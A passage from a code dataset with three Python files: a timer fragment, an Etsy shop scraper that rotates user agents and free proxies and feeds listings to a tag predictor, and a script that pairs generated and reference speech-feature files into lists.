asyncio.sleep(interval)\n\n asyncio.ensure_future(timer_coro())\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"293139502","text":"import requests\nfrom predictTags import PredictTags\nfrom bs4 import BeautifulSoup\nfrom random import choice\nfrom multiprocessing import Pool\n\nclass TopSeller:\n\tdef __init__(self, url):\n\t\tself.url = url \n\t\tself.worker()\n\n\tdef worker(self):\n\t\tuser_agent = GetUA()\n\t\tproxy = GetProxy()\n\t\thtml = requests.get(self.url, {'User-Agent': user_agent}, proxies=proxy)\n\t\tif html.status_code == 200:\n\t\t\tsoup = BeautifulSoup(html.text, 'lxml')\n\t\t\ttables = soup.find_all('table', class_='table')\n\t\t\ttable = tables[1].find('tbody')\n\t\t\ttmp_lst = table.text.replace('\\n\\n', '').split()\n\t\t\tlst_shops = [tmp_lst[i] for i in range(1, 300, 3)]\n\t\t\tif len(lst_shops) > 2:\n\t\t\t\tfor shop in lst_shops:\n\t\t\t\t\tif shop in ['CaitlynMinimalist', 'eugenie2', 'LouMarksPhoto',\n\t\t\t\t\t'PlannerKate1', 'Beadboat1', 'MignonandMignon', 'SoGoodSoWood',\n\t\t\t\t\t'PeggySueAlso', 'PlannerKate1' , 'AimVogue', 'AvEwerkz', 'PeggySueAlso'\n\t\t\t\t\t]:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tprint(shop)\n\t\t\t\t\thref = f\"https://www.etsy.com/shop/{shop}\"\n\t\t\t\t\thtml_shop = requests.get(href)\n\t\t\t\t\tsoup_shop = BeautifulSoup(html_shop.text, 'lxml')\n\t\t\t\t\tul = soup_shop.find('ul', class_='listing-cards').find_all('li')\n\t\t\t\t\tlst_items = [ul[i].find('a')['href'] for i in range(len(ul))]\n\t\t\t\t\t\n\t\t\t\t\tp = Pool(15) # Pool tells how many at a time\n\t\t\t\t\trecords = p.map(PredictTags, lst_items)\n\t\t\t\t\tp.terminate()\n\t\t\t\t\tp.join()\n\n\t\t\t\t\t# for item in lst_items:\n\t\t\t\t\t\t#PredictTags(item)\n\t\t\t\t\t\t# print(\"shop done: ==> \", shop)\n\t\t\t\t\t\t# print()\n\t\t\t\t\tprint('======================^.^======================^.^=~=========================')\n\t\t\t\n\t\t\t\nclass GetUA:\n\tdef __new__(self):\n\t\ttry:\n\t\t\twith open('ua.txt') as f:\n\t\t\t\ttmp = f.read().split('\\n')\n\t\t\treturn choice(tmp)\n\t\texcept:\n\t\t\treturn None\n\nclass GetProxy:\n\tdef __new__(self):\n\t\thtml = requests.get('https://www.us-proxy.org/')\n\t\tsoup = BeautifulSoup(html.text, 'lxml')\n\t\ttrs = soup.find('table', id='proxylisttable').find('tbody').find_all('tr')\n\t\tlst = [f\"{t.text}\" for tr in trs for t in tr]\n\t\tproxies = [f\"{lst[i]}:{lst[i+1]}\" for i in range(0, 1600, 8)]\n\t\twhile True:\n\t\t\tproxy = {\"http\": f\"http://{choice(proxies)}\"}\n\t\t\tr = requests.get('https://www.us-proxy.org/', proxies=proxy)\n\t\t\tif r.status_code == 200:\n\t\t\t\treturn proxy\n\nif __name__ == '__main__':\n\tTopSeller('https://erank.com/top-sellers')\n\t\n","sub_path":"forwork/parserShopLists.py","file_name":"parserShopLists.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146245695","text":"from pathlib import Path\n\nref_dir = Path('/Users/dintu/zalo_ai/postfilt_gan/natural_mgc')\ngen_dir = Path('/Users/dintu/zalo_ai/postfilt_gan/synthesized_mgc')\n\n# ref_dir = Path('/Training/tdinh/postfilt_gan/mgc')\n# gen_dir = Path('/Training/tdinh/postfilt_gan/mgc_gen')\n\ngFile = open('gen_files.list', 'w')\nrFile = open('ref_files.list', 'w')\ncount = 0\nfor file in gen_dir.glob('*.mgc'):\n ref_path = ref_dir.joinpath(file.name)\n if ref_path.is_file():\n gFile.write(f\"{file}\\n\")\n rFile.write(f\"{ref_path}\\n\")\n count += 1\n else:\n continue\nprint(count)","sub_path":"mkList.py","file_name":"mkList.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}